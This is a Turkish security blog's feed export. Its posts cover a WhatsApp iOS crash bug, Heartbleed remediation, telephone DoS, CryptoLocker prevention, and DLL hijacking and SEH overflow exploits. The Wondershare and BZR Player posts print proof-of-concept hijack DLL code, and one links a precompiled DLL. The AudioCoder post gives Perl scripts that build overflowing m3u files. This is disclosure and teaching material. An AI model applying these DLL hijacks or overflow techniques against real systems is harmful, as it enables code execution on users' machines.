tag:blogger.com,1999:blog-55357454532769589032024-02-21T02:56:07.703-08:00Akın Tosunlar - VigasisAnonymoushttp://www.blogger.com/profile/00334229859513933055noreply@blogger.comBlogger11125tag:blogger.com,1999:blog-5535745453276958903.post-89435521756593956202015-02-02T16:32:00.003-08:002015-02-06T06:39:40.111-08:00Whatsapp CrashMessage For IOS (DOS/POC - 0 day)<div dir="ltr" style="text-align: left;" trbidi="on">
<h3>Whatsapp Crash Message For IOS (DOS/POC - 0 day)</h3><br />
<br />
<br />
Whatsapp crash message for IOS başlığı altında bugünkü yazımda uzun süreden sonra yazıyorum tekrardan bloguma kendi buldugum DOS/POC bir açığı paylaşacağım sizlerle Whatsapp uygulamasının IOS versiyonu üzerinde bulunan bu acık sayesinde whatsapp uygulaması crash olmakta ve bir süre acılmamaktadır. Bu acık tamamiyle bendeniz tarafından keşfedilmiştir. Gerekli informasyonel bilgiyi whatsapp sirketi ile email yoluyla paylaşmış bulunmaktayım.<br />
<br />
Test ettiğim platformlar<br />
Iphone 5, Iphone 5S, Iphone 6, Iphone 4S<br />
<br />
Bütün IOS versiyonları güncel ve Whatsapp versiyonu son versiyon dahil etkilenmekte.<br />
<br />
Hatayı test etmek için<br />
<br />
<a href="http://www.crashmessage.com/">http://www.crashmessage.com</a><br />
<br />
sitesini kullanabilirsiniz.<br />
<br />
---- English<br />
<br />
<span class="" id="result_box" lang="en"><span class="hps"></span><span class="hps">I am writing</span> <span class="hps">my blog</span> <span class="hps">again</span> <span class="hps">after</span> <span class="hps">a long time and todays article for about Whatsapp Crash DOS/POC. This fully discovered by me and all informational metarial share with Whatsapp INC. This bug impact is if received malicious location message via whatsapp ios messenger. Whatsapp crash immediatelly and never open for a while.</span></span><br />
<span class="" id="result_box" lang="en"><span class="hps"><br /></span></span>
<span class="" id="result_box" lang="en"><span class="hps">Tested Platform: </span></span><br />
Iphone 5, Iphone 5S, Iphone 6, Iphone 4S (All IOS version latest and whatsapp messenger version latest)<br />
<br />
If you test this bug to your Iphone. please using<br />
<br />
<a href="http://www.crashmessage.com/">http://www.crashmessage.com</a><br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/00334229859513933055noreply@blogger.com0tag:blogger.com,1999:blog-5535745453276958903.post-78645363492923163692014-12-30T07:05:00.002-08:002014-12-30T07:06:05.585-08:00Bilişim Güvenliği Bilişim güvenliği sektöründe çalışan yada bilişim güvenliği ile ilgili gelişmeleri takip etmek isteyen kullanıcılar için Türkçe içerik yayınımız aylık olarak blogumuz üzerinden devam edecektir. Bilişim güvenliği hizmetleri yazılarına blogumuzdan ulaşabilir, yorumlarınız ile katkıda bulunabilir yada yayınlanmasını istediğiniz yazı veya soruları tarafımıza gönderebilirsiniz. Bu aşamadan sonra uzmanlarımız yayınlarınızı yada sorunlarınızı inceleyecek ve sizlere bu konular hakkındaki detaylı bilgileri sağlayacaklardır.<br />
<br />
Blogumuzda bugüne kadar genellikle en çok duyulan yazılım açıklarını yada kapatılmaması halinde risk oluşturabilecek yazılım açıklarını aktarmaya çalıştık. Okuduğunuz yayından sonra da gelecek yayınlar içerisinde ünlü bilişim güvenliği uzmanlarının dünyadaki sektör geneline bakıp yaptıkları yorumlar, gelecekle ilgili görüşleri, uzmanlarımızın fark ettikleri yazılım açıkları, gelişen dünya ve teknoloji ile değişen ve önemini arttıran siber güvenlik konuları hakkındaki uzmanlarımızın önerilerine yer vereceğiz.<br />
<br />
Siber güvenlik hizmetleri ile ilgili genel bilgiye :<br />
<br />
<a href="http://vigasis.com/bilisim-guvenligi.aspx" target="_blank">Bilişim Güvenliği</a> linki üzerinden ulaşabilir.<br />
<br />
Penetrasyon testleri ile ilgili genel bilgilere:<br />
<br />
<a href="http://vigasis.com/penetrasyon-testleri.aspx" rel="nofollow" target="_blank">Penetrasyon Testleri</a> linki üzerinden ulaşabilir.<br />
<br />
Kaynak kod analizleri ile ilgili genel bilgiye:<br />
<br />
<a href="http://vigasis.com/kaynak-kod-analizleri.aspx" rel="nofollow" target="_blank">Kaynak kod analizleri</a> linki üzerinden ulaşabilirsiniz.<br />
<br />
Bilişim güvenliği hizmetleri ile ilgili sektör çalışmalarına devam eden kişiler içinse bir çok topluluk ve dergide veya web sayfalarında bulunmuş içerikler taranacak ve önemli görünenler blog üzerinden paylaşılacaktır. Bu aşamadan sonra yapılacak çalışmalarda detaylar tüm ayrıntıları ile bloga aktarılacaktır.<br />
<br />
Ayrıca özel ürün incelemeleri ve bilişim güvenliği ürünlerinin işinize sağlayacağı katkılar hakkında da detaylı araştırmalar raporları ile birlikte yayınlanacaktır.<br />
<br />
<br />Unknownnoreply@blogger.com0Türkiye38.963745 35.24332200000003526.356997500000002 14.589025000000035 51.5704925 55.897619000000034tag:blogger.com,1999:blog-5535745453276958903.post-32605991415481597632014-04-10T13:07:00.000-07:002014-12-30T07:06:43.932-08:00OpenSSL Heart Bleed<div dir="ltr" style="text-align: left;" trbidi="on">
Selamlar,<br />
<br />
Uzun bir aradan sonra 2011 deki RDP açığından sonra gelen en büyük güvenlik tehlikesi 4 Nisan itibariyle dünyayı tehdit etmeye başladı. Bu yüzden bizde takipçilerimize bu yazıyı yazarak uyarıda bulunmak istedik. OpenSSL kütüphanesinde bulunan bir güvenlik zafiyeti sayesinde saldırgan sistem üzerindeki root sertifikaları çalabilir veya hafızada bulunan kullanıcı adı, şifre gibi birçok kritik dataya erişebilmektedir. Birçok büyük site yahoo, amazon , gmail v.b kullanıcılarına uyarılarda bulunarak parolalarını değiştirmesini söyleyen epostalar göndermeye başladılar.<br />
<br />
Risk Altındaki OpenSSL versiyonları<br />
OpenSSL 1.0.1e-fips<br />
OpenSSL 1.0.1 1.0.1f<br />
<br />
Risk Taşımayan Versiyonlar <br />
OpenSSL 1.0.1g<br />
OpenSSL 1.0.0<br />
OpenSSL 0.9.8<br />
<br />
<b><span style="color: red;">Zafiyet içeren İşletim Sistemleri</span></b><br />
<b><span style="color: red;"><br /></span></b>
Debian Wheezy (stable), OpenSSL 1.0.1e-2+deb7u4<br />
Ubuntu 12.04.4 LTS, OpenSSL 1.0.1-4ubuntu5.11<br />
CentOS 6.5, OpenSSL 1.0.1e-15<br />
Fedora 18, OpenSSL 1.0.1e-4<br />
OpenBSD 5.3 (OpenSSL 1.0.1c 10 May 2012) and 5.4 (OpenSSL 1.0.1c 10 May 2012)<br />
FreeBSD 10.0 – OpenSSL 1.0.1e 11 Feb 2013<br />
NetBSD 5.0.2 (OpenSSL 1.0.1e)<br />
OpenSUSE 12.2 (OpenSSL 1.0.1c)<br />
<br />
<b><span style="color: red;">Zafiyeti Fix Etme Metodları </span></b><br />
<b><span style="color: red;"><br /></span></b>
<span style="color: red;"><span style="color: black;">CentOS tabanlı sistemler için: yum update</span></span><br />
<span style="color: red;"><span style="color: black;">Debian tabanlı sistemler için: apt-get update</span></span><br />
<br />
<span style="color: red;"><span style="color: black;">Eğer yayınlanmıs update paketi mevcut değil ise: OpenSSL i su flag ile tekrar derlemeniz gerekmektedir.</span></span><br />
<br />
<span style="color: red;"><span style="color: black;">-DOPENSSL_NO_HEARTBEATS</span></span><br />
<br />
<span style="color: red;"><span style="color: black;">Detaylı kaynaklar için Googleda Heart Bleed aramasını yapabilirsiniz. </span></span><br />
<br />
<span style="color: red;"><span style="color: black;">http://heartbleed.com/</span></span><br />
<br />
<b><span style="color: red;"></span></b></div>
Anonymoushttp://www.blogger.com/profile/00334229859513933055noreply@blogger.com0tag:blogger.com,1999:blog-5535745453276958903.post-57215370785277061122013-11-27T17:12:00.000-08:002013-11-27T17:12:05.296-08:00Phone2DOS (TDOS)<div dir="ltr" style="text-align: left;" trbidi="on">
Selamlar,<br />
<br />
Yaklasık 3 yıl once ISTSEC konferansında anlattıgımız ve 2 yıl once MI6 v.b üst düzey kurumlara baslayan bir atak cesidi TDOS tan biraz bahsetmek istiyorum. TDOS ta metod olarak DDOS a benzeyen bir saldırı türüdür. Amac saldırı yapılan santrali veya kisinin telefonunu mesgul tutmak ve ulasılmaz hale getirmektir. İlk Olarak 3 yıl once ISTSEC bilgi güvenliği konferansında bunu dile getirmis ve dünyayı bekleyen yeni tip bir saldırı olarak nitelendirerek herkesi hazırlıklı olmaya cagirmistik. yine 2012 yılında ISCTURKEY konferansında bu saldırıyı anlatarak uygulamalı demolar gosterdik bu senede ASIS (ISC2) 2013 Dünyanın en büyük ulusal güvenlik ve siber güvenlik fuarı ve konferansındada bu konusmayı gerceklestirdik. Su günlerde ise underground level forumlarda ruslar tarafından yazılmıs bir TDOS toolu satısa sunulmus durumda.<br />
<br />
Gerekli Linkler:<br />
<br />
<a href="http://blog.lifeoverip.net/2011/06/19/istsec-11-sunum-ve-fotograflari/">http://blog.lifeoverip.net/2011/06/19/istsec-11-sunum-ve-fotograflari/</a><br />
<br />
<a href="http://www.iscturkey.org/index.php?option=com_content&view=article&id=46&Itemid=63" target="_blank">http://www.iscturkey.org/index.php?option=com_content&view=article&id=46&Itemid=63 </a><br />
<br />
<a href="https://asis.confex.com/asis/ansem2013/webprogram/Session27448.html">https://asis.confex.com/asis/ansem2013/webprogram/Session27448.html</a><br />
<br />
Cok Yakında burdan presantasyon dosyalarınıda paylasmıs olacagım....<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/00334229859513933055noreply@blogger.com1tag:blogger.com,1999:blog-5535745453276958903.post-56785075474858680462013-11-27T16:56:00.002-08:002013-11-27T16:56:47.820-08:00Wondershare Player 1.6.0 (ws_converterex.dll) - DLL Hijacking (0-day)<div dir="ltr" style="text-align: left;" trbidi="on">
Selamlar,<br />
<br />
Yine shellcoding ve exploiting teknikleri üzerine bir calisma yaparken meshur bir video player üzerinde BZR Player 'a benzeyen bir dll hijacking güvenlik acigi kesfettim. Cesitli security sitelerinde exploiti paylastıktan sonra burdanda paylasmanın uygun olacagını düsündüm.<br />
<br />
Exploitin Kanıt Videosu:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/ZItsMDwHKu8?feature=player_embedded' frameborder='0'></iframe></div>
<br />
Exploit Code:<br />
<br />
/* # Exploit Title: Wondershare Player 1.6.0 (ws_converterex.dll) - DLL Hijacking Vulnerability<br />// # Date: 27.11.2013<br />// # Exploit Author: Akin Tosunlar<br />// # Software Link: http://download.wondershare.com/player_full1374.exe<br />// # Version: 1.6.0 (Probably old version of software and the LATEST version too)<br />// # Vendor Homepage: http://www.wondershare.com<br />// # Tested on: [ Windows XP sp3]<br />// # Contact : info@vigasis.com<br />// #------------------<br />// # Web Page : http://www.vigasis.com<br />// # <br />// # YOUTUBE EXPLOIT VIDEO: https://www.youtube.com/watch?v=EKu_-uKKmDA<br />// #<br />// # gcc -shared -o ws_converterex.dll evil.c<br />// # Compile evil.c and rar or zip avi file and ws_converterex.dll same folder. Associate Default Player as Wondershare Player or OpenWith Wondershare Player.Double-click AVI File. program start Calc.exe immediately.<br />// #<br />*/ <br /><br /><br />#include <windows.h><br /><br />int evilcode()<br />{<br />WinExec("calc", 0);<br />exit(0);<br />return 0;<br />}<br /><br />BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)<br />{<br />evilcode();<br />return 0;<br />}<br />
<br />
Tesekkurler.</div>
Anonymoushttp://www.blogger.com/profile/00334229859513933055noreply@blogger.com0tag:blogger.com,1999:blog-5535745453276958903.post-72065450714917500702013-11-25T19:28:00.001-08:002013-11-25T19:35:23.409-08:00BZR Player 0.97 (codec_mpeg.dll) Dll Hijack Güvenlik Açığı (0-day)<div dir="ltr" style="text-align: left;" trbidi="on">
Selamlar,<br />
<br />
Son günlerde yaptıgım birkac exploiting ar-ge calismasi sirasinda kesfettiğim BZR Player 0.97 sürümünde olan ki bu aplikasyonun son sürümü dll hijacking güvenlik acigiyla ilgili bir yazi yazacagim.<br />
<br />
Oncelikle nedir bu DLL Hijacking?<br />
<br />
DLL hijacking windows sistemlerde calisan exe dosyalarin kullandigi yani calisirken yüklediği DLL leri oncelikle calistirdiği dosyanın dosya path inde aramasından ileri gelen güvenlik acıklarıdır. Daha acık anlatırsak. BZR Player dan ornek vereceğim bir media player oldugu icin .m3u , .wav , .mp3 v.b desteklediği mevcuttur ve biz BZR Player i varsayılan media playerimiz olarak isaretlemissek. BZR player mp3 dosyalarını calabilmesi gerekli olan codec_mpeg.dll i mp3 dosyasına tıkladıgımızda yükleyecek ve calmaya baslayacaktır fakat dll dosyasını ilk once .mp3 dosyasının path inde arayacak eger orda bulamazsa kendi kurulum dosyalarının bulundugu dizinde arayacaktır. DLL hijack güvenlik zafiyetleride tam bu noktada devreye girmektedir. Bunu sömürmenin birkac farklı yolu olmakla ben en sık kullanılan 2 metodu anlatacagım.<br />
<br />
1. Metod<br />
<br />
DLLMain fonksiyonu ile istediğimiz islemi calistirmaktır. En sık kullanılan ve en kolay metodtur.<br />
<br />
Asagidaki kodu codec_mpeg.dll olarak derleyip. herhangi bir mp3 dosyasıyla aynı klasore koyarak mp3 dosyasına cift tıkladıgımızda yada Birikte AC > BZR Player sectigimizde kendi path indeki evil dll imizi load edecek ve calc.exe yi calistiracaktir. Ornek kod asagidadir.<br />
<br />
***************************<br />
#include <windows.h><br />
<br />
int evilcode()<br />
{<br />
WinExec("calc", 0);<br />
exit(0);<br />
return 0;<br />
}<br />
<br />
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)<br />
{<br />
evilcode();<br />
return 0;<br />
}<br />
****************************<br />
<br />
Derleme ile ugrasmak istemeyenler icin derlenmis dosya linkini veriyorum.<br />
<a href="http://www.filedropper.com/codecmpeg" target="_blank">http://www.filedropper.com/codecmpeg</a><br />
<br />
<br />
Indirginiz dll dosyası ve mp3 dosyasını aynı klasore koyarak BZR player ile actiginizda sisteminizde calculator.exe calisacaktır.<br />
<br />
<br />
2. Metod<br />
<br />
Bu biraz daha mesakatli bir methodtur. Bunda exploit edecegimiz dll dosyasının gerceginin icindeki EXPORTED fonksiyonları bularak o fonksiyonları kendi DLL dosyamızda tanımlayarak sistemi exploit etmeye calisacagiz.Bunun icin ben Visual C++ 6.0 ile beraber gelen dumpbin.exe dosyasını kullanacagim ama siz isterseniz 3rd party Deprencys Walker ida kullanabilirsiniz.<br />
<br />
dumpbin.exe dosyası bizim belirttiğimiz dll icerigindeki export edilmis yani disaridan cagrilabilir fonksiyonların isimlerini belirlememizi saglayacak.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG2BcWWtp3FmHOqU3ylvsLeDrC5VuBLsjhTYyrjHZjHYffZgWq-2SkxCoFT2A6g77RXmsNeZPJue_RbzqIrDBDnga0ojFCQ5OkzVlf4NJGCSPDTThKo2cGsHG_uNsMhFBd_nyK31Gqzw0/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="461" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG2BcWWtp3FmHOqU3ylvsLeDrC5VuBLsjhTYyrjHZjHYffZgWq-2SkxCoFT2A6g77RXmsNeZPJue_RbzqIrDBDnga0ojFCQ5OkzVlf4NJGCSPDTThKo2cGsHG_uNsMhFBd_nyK31Gqzw0/s640/1.PNG" width="640" /></a></div>
<br />
Resimdede görüldüğü gibi codec_mpeg.dll dosyamız dısarıya acık 2 adet fonksiyon bulundurmakta onlarda<br />
_FMODGetCodecDescriptionEx ve _FMODGetDSPDescriptionEx fonksiyonlarıda simdi bu fonksiyonlara uygun C dosyamızı yazarak derledigimizde ve yine mp3 dosyamız ile aynı klasore koydugumuzda calculator.exe nin calistigini gorecegiz. Gerekli C kodu asagidaki gibi olmalıdır.<br />
<br />
**************** CODE ***************<br />
<br />
<div class="line number25 index24 alt2">
<code class="c preprocessor">#include <windows.h></code></div>
<div class="line number26 index25 alt1">
<code class="c preprocessor">#define DLLIMPORT __declspec (dllexport)</code></div>
<div class="line number26 index25 alt1">
</div>
<div class="line number26 index25 alt1">
<div class="line number28 index27 alt1">
<code class="c plain">DLLIMPORT </code><code class="c keyword bold">void</code> <code class="c plain">_FMODGetCodecDescriptionEx() { evil(); }</code></div>
<div class="line number29 index28 alt2">
<code class="c plain">DLLIMPORT </code><code class="c keyword bold">void</code> <code class="c plain">_FMODGetDSPDescriptionEx() { evil(); }</code></div>
<div class="line number29 index28 alt2">
</div>
<div class="line number29 index28 alt2">
<div class="line number63 index62 alt2">
<code class="c color1 bold">int</code> <code class="c plain">evil()</code></div>
<div class="line number64 index63 alt1">
<code class="c plain">{</code></div>
<div class="line number65 index64 alt2">
<code class="c spaces"> </code><code class="c plain">WinExec(</code><code class="c string">"calc"</code><code class="c plain">, 0);</code></div>
<div class="line number66 index65 alt1">
<code class="c spaces"> </code><code class="c functions bold">exit</code><code class="c plain">(0);</code></div>
<div class="line number67 index66 alt2">
<code class="c spaces"> </code><code class="c keyword bold">return</code> <code class="c plain">0;</code></div>
<div class="line number68 index67 alt1">
<code class="c plain">}</code></div>
<div class="line number68 index67 alt1">
</div>
<div class="line number68 index67 alt1">
<code class="c plain">***************************************** </code></div>
</div>
</div>
Exploitle ilgili bir kısa video cekerek olayı daha iyi anlamanız icin ekliyorum..<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.youtube.com/watch?v=RpwxTxpPDQ0">https://www.youtube.com/watch?v=RpwxTxpPDQ0</a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i1.ytimg.com/vi/R_NDHA972NI/0.jpg"><param name="movie" value="http://www.youtube.com/v/R_NDHA972NI?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" /><param name="bgcolor" value="#FFFFFF" /><param name="allowFullScreen" value="true" /><embed width="320" height="266" src="http://www.youtube.com/v/R_NDHA972NI?version=3&f=user_uploads&c=google-webdrive-0&app=youtube_gdata" type="application/x-shockwave-flash" allowfullscreen="true"></embed></object></div>
<br />
<br />
<div style="text-align: center;">
Tesekkurler!!!!</div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
</div>
Anonymoushttp://www.blogger.com/profile/00334229859513933055noreply@blogger.com0tag:blogger.com,1999:blog-5535745453276958903.post-77367861320014749362013-11-23T06:17:00.001-08:002013-11-23T06:17:02.560-08:00CryptoLocker Virüsüne Dikkat!!<div dir="ltr" style="text-align: left;" trbidi="on">
Selamlar,<br />
<br />
Bu yazımda bahsedeceğim bir malware fakat diğer alışılagelmiş virüslere göre değişik bir iş yapan bir virüs gectiğimiz yıllarda ülkemizdede boy gösteren bilgisayarınız bir bilişim sucuna karıştı ve kilitlendi acmak icin suraya para yatırın gibisinden mesaj cıkaran virüslerin bir benzerinden. Bu malware bulasmıs oldugu bilgisayardaki verileri çözülemeyecek sekilde kriptolayarak sizden verilerinizi geri kurtarmak icin para istemekte.<br />
<br />
CryptoLocker virüsünün 1 haftadan kısa bir sürede 12000 den fazla ABD bilgisayarına yayıldıgı düsünülürse bu virüsün etkilerinin sadece ABD ile sınırlı kalmayacağı yakında ülkemizdede boy göstereceği birçok kişinin ve kurumun canını yakacagı kesin.<br />
<br />
Virüs bulastıgı bilgisayarda acılısından büyük kırmızı bir ekran üzerinden verilerinizi kaybetmeden önce 100 saatiniz var gibi bir uyarı cıkararak ödemenin yapılacagı adresleri vermekte. 750 $ veya 2 Bitcoin ödeme isteyen malware sahibi hemen sonrasında size decryption keyi göndermekte ve bu virüsün gecen hafta ABD PC lerine sızmasıyla birlikte ABD polis teskilatınında bundan etkilendiği ve virüsün yazarına verilerini kurtarmak icin 750 $ gönderdiği dedikoduları yayılmaktadır. Virüsün bulasmasını engellemek icin yapılması gerekenlerden birkacını yazmakta fayda görüyorum.<br />
<br />
<ol style="text-align: left;">
<li>Birçok virüsün eposta eklentileri icerisindeki rar,zip v.b gibi dosyalar üzerinden yayıldığını düsünürsek güvenilmeyen göndericilerden gelen dosyaları acmamak , güvendiğiniz bir kisiden gelen gönderileride virüs taramasından gecirmeden acmamak , eğer mümkünse bu mail iceriklerine kendi PC'niz altında kurdugunuz sanal makina üzerinden bakmak</li>
<li>Virüs programınızın lisanslı ve son sürümde oldugundan emin olmak. (Bazı insanların ne düsündügünü tahmin edebiliyorum virüs yeni bir virüs PE Header ları değiştirilmisse ne ise yarayacakki fakat unutulmaması gereken konu %50 ye göre %55 daha iyidir siz güvenliğinizi ne kadar arttırırsanız saldırganın isini okadar zorlastırmıs olursunuz)</li>
<li>Düzenli yedek almak. Böylelikle kaybedeceğiniz datalarınızı minimum'a indirmis olursunuz.</li>
<li>Cloud üzerinde yedek almak</li>
<li>Sistem geri donus noktaları yaratarak sistemi virüs bulasmadan onceye döndürebilirsiniz.</li>
</ol>
CryptoLocker virüsünü tanıyan ve en iyi korumayı sağlayan birkac virüs programı ve antimalware şunlardır. <br />
<br />
A) CryptoPrevent Tool: Bu arac diskinizi kriptolamaya calısan yazılımlara karsı güclü bir önleme sunmaktadır.<br />
B) Hitman Pro AntiMalware: Yine bu program ilede kripto virüslerine karsı koruma saglayabilirsiniz<br />
C) BitDefender Anti-CryptoBlocker: Yine BitDefender'in bu aracı sayesinde bu tip virüslerden korunmanız mümkün.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkfNW7f_qhTJsyDskYj9K1GYh7VCu98junmflNAVtD6FgUAf_8NEtYMHFbSwulu22uo8_LwN3Vb3cU3S9yO72aSl47COaRSwoRCpxaKeJc0AkLpWUQivb122JRRAr1yLZ3pvMKTVvWO9E/s1600/malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkfNW7f_qhTJsyDskYj9K1GYh7VCu98junmflNAVtD6FgUAf_8NEtYMHFbSwulu22uo8_LwN3Vb3cU3S9yO72aSl47COaRSwoRCpxaKeJc0AkLpWUQivb122JRRAr1yLZ3pvMKTVvWO9E/s400/malware.png" width="400" /></a></div>
<div>
</div>
</div>
Anonymoushttp://www.blogger.com/profile/00334229859513933055noreply@blogger.com0tag:blogger.com,1999:blog-5535745453276958903.post-17917395096661928902013-11-21T16:16:00.000-08:002013-11-23T06:24:04.647-08:00AudioCoder 0.8.22 (.m3u) - SEH Buffer Overflow (Incelenmesi ve Tekrardan Kodlanması)<div dir="ltr" style="text-align: left;" trbidi="on">
Selamlar,<br />
<br />
Bugünkü yazımda yeni yayınlanmıs bir güvenlik zafiyeti (exploit) hakkında inceleme ve tekrardan yeni bir exploit olarak kodlanması konusunda acıklamalarda bulunacağım. Öncelikle pc ve sistemleri tehdit eden en büyük güvenlik acıklarının basında kullanmakta oldugumuz yazılımların yarattıgı tehlikeler gelmekte. Bu tehlikeler öyleki sizin elinizde olmadan gerceklesmektedir. Saldırganın hedef aldıgı sistemde calısan uygulamalar yerel veya uzak olabilir. Eğer yerel ise sosyal mühendislik methodları sayesinde sistem hakkında detaylı bilgi sahibi olabilir , eğer uzak ise nmap v.b araçlar ile karsı sistem hakkında acık olan portları kullanan yazılımlar hakkında bilgi sahibi olabilir. Genelde en tercih edilen dısarıdan belli portlar üzerinden iletişim kuran yazılımlardır çünkü uzaktan kod calıstırılmasına veya sistemin durdurulmasına imkan verirler. Yerel uygulamalar üzerindeki güvenlik acıkları ise yine sosyal mühendislik ile karsı sisteme belli iceriklerde dosya gondererek zafiyet iceren yazılım ile acılması ile ortaya cıkan tehditlerdir. Örnek verecek olursak adobe reader üzerinde güvenlik zafiyeti tespit eden bir saldırganın karsı sisteme sızabilmesi için aynı zafiyeti tasıyan bir versiyon üzerinde calısan bir bilgisayara email,anlık mesajlasma yazılımları v.b sistemler üzerinden tehdit iceren dosyasını göndermesi gerekmektedir. Bu yazımda Audiocoder 0.8.22 versiyonu üzerinde tespit edilmis M3U uzantılı bir güvenlik zafiyetini inceleyeceğim.<br />
<br />
Öncelikle belirtmekte fayda görüyorum bu SEH Based bir güvenlik zafiyetidir. Yani Audiocoder yazılımını gelistiren gelistiriciler hafıza tasması (Buffer Overflow) güvenlik zafiyetine karsı ufak bir önlem almıslar fakat bu yeterli olmamıstır. Biz bu tip zafiyetlere SEH Based (Yapısal Hata İşleyici) adını vermekteyiz. Basitce örnekleyecek olursak.<br />
<br />
C# ta program yazan bir kişinin bir verinin hatalı gelmesi durumunda programın kitlenip kapanmaması icin yazmıs oldugu Try , Catch , Finally bloklarını örnek gösterebiliriz.<br />
<br />
<br />
Try {<br />
String verioku = Console.ReadLine();<br />
.<br />
.<br />
. <br />
}<br />
Catch (Exception ex) {<br />
MessageBox.Show(ex.Message);<br />
}<br />
<br />
Örnek olarak ele aldığımız tehditle ilgili yazılmıs ve yayınlanmıs olan exploit ve zafiyet iceren uygulamayıda testleriniz için bulabileceğiniz linki veriyorum.<br />
<br />
<a href="http://www.exploit-db.com/exploits/29309/">http://www.exploit-db.com/exploits/29309/</a><br />
<br />
Burda exploit writerin yazmıs oldugu kod mevcut fakat bir kendi kodumuzu Buffer size ları daha efektif kullanarak tekrardan yazacagız.<br />
<br />
Öncelikle programın hata vermesini sağlamak birinci önceliğimizi oluşturmakta. Bunun için hafıza tasması metodlarında kullandıgımız uzun string verileri zafiyet tasıyan uzantı icine yazarak denemelerde bulunabiliriz. Yalnız baslamadan belirtmekte fayda görüyorum sadece \x41 yani A harfi iceren stringler bazen programı crash etmemekte buda zafiyeti bulmayı zorlastırmaktadır. Bu gibi durumlarda birde \x90 NOP (No Operation) , \xCC (Break) , \x00 Null operatorlerini stringlerde denemenizi tavsiye etmekteyim.<br />
<br />
Bu programda ben direk A harfi yerine \x90 stringi ile baslayacagım. Crash icin bir perl dosyası yaratıyoruz. Siz python veya baska iyi bildiğiniz programlama dilini kullanabilirsiniz. Örnek (NodeJS v.s).<br />
<br />
my $file= "test.m3u";<br />
my $eip = "http://" . ("\x90" x 700);<br />
<br />
open($FILE,">$file");<br />
print $FILE $eip;<br />
close($FILE);<br />
print "m3u dosyası yaratıldı\n"; <br />
<br />
Denemeleri WinDBG programı ile Windows XP SP3 bir makinada gerceklestireceğiz. WinDBG programı ile AudioCoder programını calıstırıyoruz.<br />
<br />
Yarattıgımız 700 Bytelık veriyi load ettiğimizde programın crash oldugunu goruyoruz. Ve debugger cıktısında baktıgımızda Eip değerinin yani bir sonraki calıstırılacak kod blogu degerinin load ettiğimiz m3u dosyasının icerisinde yazmıs oldugumuz string olarak değiştiğini görmekteyiz.<br />
<br />
First chance exceptions are reported before any exception handling.<br />
This exception may be expected and handled.<br />
eax=004b5f30 ebx=001eb168 ecx=0021a6e0 edx=00000023 esi=7e37f3c2 edi=004b5f30<br />
eip=90909090 esp=0012e4fc ebp=0012e714 iopl=0 nv up ei pl nz na po nc<br />
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202<br />
Missing image name, possible paged-out or corrupt data.<br />
<br />
Stack degerini dump ettiğimizde bizim dokumanımızın stack'e yerlestiğini gormekteyiz.<br />
<br />
0:000> d esp<br />
0012e4fc 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
0012e50c 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
0012e51c 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
0012e52c 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
0012e53c 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
0012e54c 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
0012e55c 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................<br />
0012e56c 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90<br />
<br />
<br />
<br />
<br />
<br />
Burda yapamız gereken tam buffer i bulmaya calısmaktır. Bunun için pattern create ve offset toolları kullanabilirsiniz. Bu konuya burda değinmeyeceğim.<br />
<br />
Şimdi WinDbg programına !exchain komutunu vererek SEH Chain zincirinin kırıldıgı yeri bulacağız.<br />
Çok uzun bir cıktı verecektir. Burda dikkat etmemiz gereken Chain in KERNEL32 üzerinde olmadıgı olmadıgı bir cıktı yakalamaktır. O cıktıyı yakaladıgımızda gercek Buffer Junk'ımızı tespit etmis olacagız.Suan aldıgımız !exchain cıktısı.<br />
<br />
0012ffe0: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll - <br />
kernel32!ValidateLocale+2b0 (7c839ac0)<br />
Invalid exception stack at ffffffff<br />
<br />
<br />
Konuyu uzun uzadıya uzatmak istemiyorum. Bu yüzden exploit writerin buldugu size i deneyeceğiz. <br />
<br />
my $file= "test.m3u";<br />
my $eip = "http://" . ("\x90" x 757);<br />
<br />
open($FILE,">$file");<br />
print $FILE $eip;<br />
close($FILE);<br />
print "m3u dosyası yaratıldı\n";<br />
<br />
